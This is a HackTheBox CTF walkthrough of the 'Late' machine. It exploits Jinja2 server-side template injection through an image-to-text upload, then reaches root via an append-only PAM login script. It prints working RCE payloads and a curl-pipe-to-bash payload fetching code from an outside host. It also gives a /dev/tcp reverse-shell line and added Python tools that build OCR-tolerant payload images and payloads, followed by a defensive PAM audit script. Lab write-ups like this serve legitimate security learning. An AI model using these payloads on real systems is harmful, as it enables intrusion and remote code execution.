Late — Hackthebox Walkthrough

My first machine on Hackthebox, Late, was an easy Linux machine. I wanted to give beginners who aren’t familiar with it a taste of exploiting SSTI in a unique way. Hope I have done a good job with this one.

User

Nmap shows three open ports: 22, 80 and 50816. Scanning the full port range (-p-) is what turns up 50816; a default top-1000 scan would miss it.

nmap -p- -v 192.168.1.4

Visiting port 80 we see a static webpage.

Doing some vhost fuzzing, we find another vhost, image.late.htb.

This site lets us convert images to text. We can upload an image and see what it gives back. I used an online text-to-image converter to create the image.

After uploading the image, we get the extracted text.

So we know the conversion works. We can test the application for common vulnerabilities like XSS, SQLi and command injection (CMDi). Since the only input is the image, we first have to render each payload into an image and upload that.

Testing for these vulnerabilities, we get a hit with the SSTI probe {{7*7}}: the extracted text comes back as 49 instead of the literal string.

Given the name of the box, “Late”, we can see why SSTI worked (Temp“late”). Now it’s confirmed that SSTI is possible here. But when we try to get RCE by uploading an image with a payload like this,

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

it doesn’t work. This is because the image-to-text (OCR) step misreads some characters: a few are dropped and others are inserted, which breaks the payload. For example, when I convert:

this to text, it gets converted to:

Note that some characters have been added and others dropped. The reliable way around this is to write our own script that generates the image, so we control the font and layout and can iterate quickly. Since we know the target is running Python, we can write the script in Python as well.

After setting “t” to the SSTI payload, we can embed it in an image with this script.
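The generator script itself did not survive in the post, so here is an added example of the same idea, written for this walkthrough and not the author’s original code. It renders a payload black-on-white with generous padding so the OCR has clean glyphs to read. It assumes Pillow 9.2 or newer; the TrueType font names are guesses about the host and it falls back to Pillow’s built-in font, upscaled, when none of them exists.

```python
"""Render an SSTI payload into a PNG that survives the image-to-text step.

Added example, not the write-up's script. Assumes Pillow >= 9.2. The font
names tried first are assumptions about what the host has installed; the
built-in fallback always loads but is tiny, so it is upscaled for the OCR.
"""
import io
import sys

from PIL import Image, ImageDraw, ImageFont

PROBE = "{{7*7}}"  # harmless SSTI probe from the write-up


def load_font(size=48):
    """Return (font, upscale_factor). TrueType first, built-in bitmap font last."""
    for name in ("DejaVuSansMono.ttf", "DejaVuSans.ttf", "LiberationMono-Regular.ttf"):
        try:
            return ImageFont.truetype(name, size), 1   # assumption: font is on the host
        except OSError:
            continue
    return ImageFont.load_default(), 5                 # small glyphs, so upscale 5x


def render_text(text, margin=30):
    """Draw `text` black on white with a margin and return a grayscale Image."""
    font, scale = load_font()
    # Measure the text on a throwaway canvas so the final image fits it exactly.
    probe = ImageDraw.Draw(Image.new("L", (1, 1), 255))
    left, top, right, bottom = probe.textbbox((0, 0), text, font=font)
    width = (right - left) + 2 * margin
    height = (bottom - top) + 2 * margin
    img = Image.new("L", (width, height), 255)
    # Shift by the bbox offset so the glyphs start exactly `margin` px from the edge.
    ImageDraw.Draw(img).text((margin - left, margin - top), text, fill=0, font=font)
    if scale > 1:
        # NEAREST keeps the edges crisp; bilinear blur hurts OCR on a bitmap font.
        img = img.resize((width * scale, height * scale), Image.NEAREST)
    return img


def payload_png(text, margin=30):
    """Return the rendered payload as PNG bytes, ready to upload."""
    buf = io.BytesIO()
    render_text(text, margin).save(buf, format="PNG")
    return buf.getvalue()


def write_payload_image(text, path):
    """Write the PNG to `path` and return its size in bytes."""
    data = payload_png(text)
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    t = sys.argv[1] if len(sys.argv) > 1 else PROBE
    print(f"wrote payload.png ({write_payload_image(t, 'payload.png')} bytes)")
```

Run it as `python3 render_payload.py '{{7*7}}'`, upload the resulting payload.png, and compare the extracted text with what you rendered; if characters still come back wrong, increase the font size or margin rather than fighting the OCR with a different payload.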

Now we can create an image with a proper RCE payload in it. There are many ways to get RCE from a Jinja2 SSTI; after a couple of tries, this payload survives the OCR step and works against the application. The trick is that it contains no literal double underscores: each “_” in __globals__, __builtins__ and __import__ is written as the string escape \x5f, which the template engine decodes before doing the lookup.

{{request['application']['\x5f\x5f' + 'globals'+'\x5f\x5f' ]['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']("os")['popen']('id')['read']()}}

We can create the image with this payload, upload it and verify that we indeed have Remote Code Execution.

With a little bit of tinkering, we can get a reverse shell with this payload.

{{request['application']['\x5f\x5f' + 'globals'+'\x5f\x5f' ]['\x5f\x5f'+'builtins'+'\x5f\x5f' ]['\x5f\x5fimport\x5f\x5f']("os")['popen']('curl 192.168.1.7/k|bash')['read']()}}
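To make the two payloads above (the id check and the curl-to-bash reverse shell) reproducible, here is an added helper that builds them from any command; it is example code written for this walkthrough, not the author’s. It spells every underscore as the \x5f escape so no literal “__” is ever drawn for the OCR to mangle, and it refuses commands containing a single quote, because that would terminate the Jinja2 string literal holding the command. The chain request.application -> __globals__ -> __builtins__ -> __import__("os") is the one the post uses; Jinja2 resolves a subscript with a string key by falling back to getattr, which is why ['__globals__'] reaches the attribute.

```python
"""Generate OCR-tolerant Jinja2 SSTI payloads like the ones used on Late.

Added example, not code from the original write-up. Double underscores are
the characters most likely to be broken by the image-to-text step, so every
'_' is written as the string-literal escape \\x5f. Jinja2 decodes Python-style
escapes inside quoted strings before the lookup runs, and a string subscript
that fails as an item lookup falls back to getattr, so ['__globals__'] works.
"""

UNDERSCORE = "\\x5f"  # the four characters \ x 5 f: one underscore after decoding


def dunder(name):
    """Quote a dunder name with escaped underscores, e.g. globals -> '\\x5f\\x5fglobals\\x5f\\x5f'."""
    return "'" + UNDERSCORE * 2 + name + UNDERSCORE * 2 + "'"


def ssti_payload(cmd):
    """Build request.application -> __globals__ -> __builtins__ -> __import__('os').popen(cmd).read().

    The command sits inside a single-quoted Jinja2 string, so it must not
    contain a single quote; stage anything complex via `curl host/script|bash`.
    """
    if "'" in cmd:
        raise ValueError("a single quote would terminate the Jinja2 string literal")
    chain = (
        "request['application']"
        "[" + dunder("globals") + "]"
        "[" + dunder("builtins") + "]"
        "[" + dunder("import") + "](\"os\")"
        "['popen']('" + cmd + "')['read']()"
    )
    return "{{" + chain + "}}"


def decode_literals(payload):
    """Show the payload as Jinja2 sees it after decoding the \\x5f escapes."""
    return payload.replace(UNDERSCORE, "_")


def uses_literal_dunder(payload):
    """True if a raw '__' survives; those are the payloads the OCR broke."""
    return "__" in payload


if __name__ == "__main__":
    for command in ("id", "curl 192.168.1.7/k|bash"):
        p = ssti_payload(command)
        print(p)
        print("  decodes to:", decode_literals(p))
```

Pipe the output straight into the image generator, and keep `decode_literals` handy when a payload fails: comparing the decoded form with the text the service extracted shows exactly which character the OCR changed.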

Root

From the reverse shell we can add our SSH public key to the user’s authorized_keys file and SSH in for a stable shell.

Running pspy, we see some commands related to sending mail. Analyzing the behavior, we can see that whenever a user logs in over SSH, a mail is sent to “root@late.htb”.

These kinds of login hooks are usually configured through PAM. Looking at the PAM configuration for sshd (/etc/pam.d/sshd), we can see an entry that runs a script after every successful login.

Looking at the script that gets run, we can see that it is owned by the “svc_acc” user, the account we already have.

PAM runs this script in sshd’s context, which is root, so any command we put in this file will be executed as root on the next login.
But when we try to edit the file, we get an error saying “Operation not permitted”.

Usually this error appears when we try to write to a file we have no permission for. But here we own the file, so the normal permission bits are not the problem. Checking the file’s extended attributes shows why: the “a” attribute is set.

lsattr ssh-alert.sh

This makes the file append-only: existing content can’t be overwritten or truncated, but new lines can still be appended to it.

So we can just append the command we want executed to the file. The redirection must be “>>”; a plain “>” would try to truncate the file and fail with the same “Operation not permitted” error.

echo 'bash -i >& /dev/tcp/192.168.1.7/9090 0>&1' >> ssh-alert.sh

After running this, we start a listener and log in again as “svc_acc” over SSH. PAM runs the script as root on login, and we get a shell as root.
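The steps above (find the PAM login hook, check who owns the script, check its extended attributes) are what a defender would want to audit for as well. Here is an added example of that audit, written for this walkthrough and not part of the original post: it pulls pam_exec.so entries out of a PAM service file, reads lsattr output, and reports a root-run script that a non-root user owns, distinguishing the append-only case from the immutable one. All file contents, paths and owners below are constructed samples, not the real files from the box.

```python
"""Audit a PAM service file for pam_exec hooks a low-privilege user can modify.

Added example, not from the write-up. pam_exec.so runs its command with the
privileges of the calling process (root for sshd), so a hook script owned by a
normal user is a privilege escalation. The append-only ('a') attribute stops
overwrites but not `>>`, so it does not make such a script safe; only the
immutable ('i') attribute does, until root removes it. Sample data is constructed.
"""

# Real pam_exec options that may precede the command on a pam_exec.so line.
PAM_EXEC_FLAGS = {"debug", "expose_authtok", "seteuid", "quiet", "stdout"}

SAMPLE_PAM_SSHD = """\
# /etc/pam.d/sshd  (constructed sample, not the box's actual file)
@include common-auth
account    required     pam_nologin.so
session    optional     pam_motd.so motd=/run/motd.dynamic
session    optional     pam_exec.so seteuid /usr/local/sbin/ssh-alert.sh
session    optional     pam_exec.so quiet log=/var/log/motd-refresh.log /usr/local/sbin/motd-refresh.sh --fast
"""

SAMPLE_LSATTR = """\
-----a--------e------- /usr/local/sbin/ssh-alert.sh
--------------e------- /usr/local/sbin/motd-refresh.sh
"""

# Constructed owners, as `stat -c '%U' <path>` would report them.
SAMPLE_OWNERS = {
    "/usr/local/sbin/ssh-alert.sh": "svc_acc",
    "/usr/local/sbin/motd-refresh.sh": "root",
}


def pam_exec_hooks(pam_conf):
    """Return (module_type, script_path, options) for every pam_exec.so line."""
    hooks = []
    for raw in pam_conf.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        fields = line.split()
        idx = next((i for i, f in enumerate(fields) if f.endswith("pam_exec.so")), None)
        if idx is None:
            continue
        rest = fields[idx + 1:]
        options = []
        while rest and (rest[0] in PAM_EXEC_FLAGS or "=" in rest[0]):
            options.append(rest.pop(0))               # options come before the command
        if rest:
            hooks.append((fields[0], rest[0], options))
    return hooks


def parse_lsattr(output):
    """Map path -> set of attribute letters from `lsattr` output lines."""
    attrs = {}
    for line in output.splitlines():
        if line.strip():
            flags, path = line.split(None, 1)
            attrs[path.strip()] = {c for c in flags if c != "-"}
    return attrs


def assess(owner, attrs):
    """One-line verdict for a script that pam_exec runs as root."""
    if owner == "root":
        return "ok: owned by root"
    if "i" in attrs:
        return f"protected: owned by {owner} but immutable (+i) until root runs chattr -i"
    if "a" in attrs:
        return f"EXPLOITABLE: owned by {owner}, append-only (+a) blocks overwrite but `>>` still works"
    return f"EXPLOITABLE: owned by {owner}, fully writable"


def audit(pam_conf, lsattr_output, owners):
    """Return {script_path: verdict} for each pam_exec hook in the service file."""
    attrs = parse_lsattr(lsattr_output)
    return {
        script: assess(owners.get(script, "unknown"), attrs.get(script, set()))
        for _mtype, script, _opts in pam_exec_hooks(pam_conf)
    }


if __name__ == "__main__":
    for script, verdict in audit(SAMPLE_PAM_SSHD, SAMPLE_LSATTR, SAMPLE_OWNERS).items():
        print(f"{script}: {verdict}")
```

On a real host, feed it the contents of each file under /etc/pam.d, the output of `lsattr` on the referenced scripts, and owners from `stat -c '%U'`; anything that prints EXPLOITABLE is the Late privesc waiting to happen.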

And rooted!!

This being my first box in HTB, I am extremely happy that I have accomplished this at such a young age.

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄

Kavishka Gihan

Cyber Security Student — find me on instagram @_kavi.gihan